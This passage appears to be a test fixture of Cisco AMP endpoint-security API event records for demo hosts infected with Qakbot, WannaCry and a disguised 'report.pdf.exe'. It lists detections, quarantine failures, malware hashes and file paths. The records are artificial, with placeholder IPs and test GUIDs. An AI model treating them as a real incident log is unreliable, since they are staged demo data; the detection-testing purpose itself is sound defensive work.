found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 